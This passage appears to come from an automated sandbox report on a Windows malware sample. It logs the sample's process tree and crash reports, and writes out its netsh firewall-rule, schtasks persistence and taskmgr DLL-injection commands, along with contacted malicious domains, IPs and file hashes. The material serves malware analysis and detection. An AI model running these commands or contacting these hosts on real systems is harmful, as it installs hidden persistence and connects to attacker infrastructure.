N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 344

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 736

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 708

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 756

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 812

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 720

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 772

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4592 -ip 4592

C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 300

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 300

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 708

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 724

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 780

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 872

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 856

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1644

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1420

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1632

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1652

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4568 -ip 4568

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1704

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4568 -ip 4568

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4568 -s 1456

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /197-197

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 340

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 340

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 748

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 740

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 676

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 336

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 956

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 616

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5352 -ip 5352

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1492

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1400

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1552

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1468

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1564

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1504

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1484

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5352 -ip 5352

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1628

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5352 -ip 5352

Network

Country Destination Domain Proto
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.113.22.20.in-addr.arpa udp
US 8.8.8.8:53 207.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 humisnee.com udp
NL 37.48.65.151:443 humisnee.com tcp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 205.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 195.233.44.23.in-addr.arpa udp
US 8.8.8.8:53 151.65.48.37.in-addr.arpa udp
US 8.8.8.8:53 survey-smiles.com udp
US 199.59.243.225:80 survey-smiles.com tcp
US 8.8.8.8:53 225.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 ninhaine.com udp
US 8.8.8.8:53 2makestorage.com udp
US 8.8.8.8:53 nisdably.com udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 70c7f849-f917-48e2-957d-4b64ce8aeb84.ninhaine.com udp
US 8.8.8.8:53 server11.ninhaine.com udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
CZ 46.8.8.100:443 server11.ninhaine.com tcp
CZ 46.8.8.100:443 server11.ninhaine.com tcp
CZ 46.8.8.100:443 server11.ninhaine.com tcp
US 8.8.8.8:53 ww82.ninhaine.com udp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 100.8.8.46.in-addr.arpa udp
US 8.8.8.8:53 spolaect.info udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 192.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
CZ 46.8.8.100:443 server11.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

memory/4592-1-0x0000000002B50000-0x0000000002F8E000-memory.dmp

memory/4592-2-0x0000000002F90000-0x00000000038B7000-memory.dmp

memory/4592-3-0x0000000000400000-0x000000000258E000-memory.dmp

memory/4592-5-0x0000000000400000-0x000000000258E000-memory.dmp

memory/4592-6-0x0000000002F90000-0x00000000038B7000-memory.dmp

memory/4568-7-0x00000000028D0000-0x0000000002D0E000-memory.dmp

memory/4568-8-0x0000000002D10000-0x0000000003637000-memory.dmp

memory/4568-9-0x0000000000400000-0x000000000258E000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 09af2a562bf25f83f51bf3699b16d5b6
SHA1 c187ffcf40d7998b46a3a9f14e1f638f8d49c5e4
SHA256 e4f27364add69769e2c783282969cb5a402357685ff2f0c935e15482b93def1b
SHA512 9e960c1c8c68cb9a36e7d544676b973c359d6373496af89d7d46a875ae0f9205de83cc8d82fd62af444f96696338ff13a36549a3cc70167dea3cb7fd7fc1e235

C:\Windows\rss\csrss.exe

MD5 a1fcc944237ba57f897d2c95bee0e044
SHA1 0bb5a4ef2ccc2bb9d41cbf7082e3cbc49b7f5e27
SHA256 3402853ea7ad2c249deac219cd7f3e535c36d5158adbfc3e4dfe1e610a36b63e
SHA512 1ea0b4a0b7a0c7153bdf4725c911f7af7f20475864f3e0095bb971ca009d9e4b2de1b1c51a04a0dd482acc337907b437073e33c12792ce2b72a65e62f78087fa

memory/4568-17-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-21-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-20-0x0000000002E00000-0x0000000003300000-memory.dmp

memory/5352-22-0x0000000000400000-0x000000000258E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 5972f8a92166f37c67a3d70921794c96
SHA1 0974e74b29054f7edc6f2275804a44623a575bda
SHA256 e315541f6881f5032fefe499e1d82d7d36a6f51be91ee0f2422894aaa3644aaa
SHA512 f76cf38b5f6911d6da78d8fbd5b8c7cd53f6292c4f2e9094e6c5c0950a2cc755fb24e5c7d82b01b47c4ed7039832dfab23b2b89d6fc67e8babee4f197cc01498

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 1868d1207d734ac95ef900476b1d1fc2
SHA1 58dc6fd96a51edd9894302048989a40f239159c2
SHA256 7d75b5eb33370ba631f86ab8d9582866df942897066b2a12f10ae8b0202f48af
SHA512 ce2a0b5d43539278aebde9e7389db357e4bcaf864227f46abc8565361c17ccfbac0a9c0ef058b71f35cb0331b910a70f40de9c9f05232fd8f7d5044ffefc470c

memory/5352-29-0x0000000002E00000-0x0000000003300000-memory.dmp

memory/5352-28-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-30-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-31-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-32-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-33-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-34-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-35-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-36-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-37-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-38-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-39-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-40-0x0000000000400000-0x000000000258E000-memory.dmp

memory/5352-41-0x0000000000400000-0x000000000258E000-memory.dmp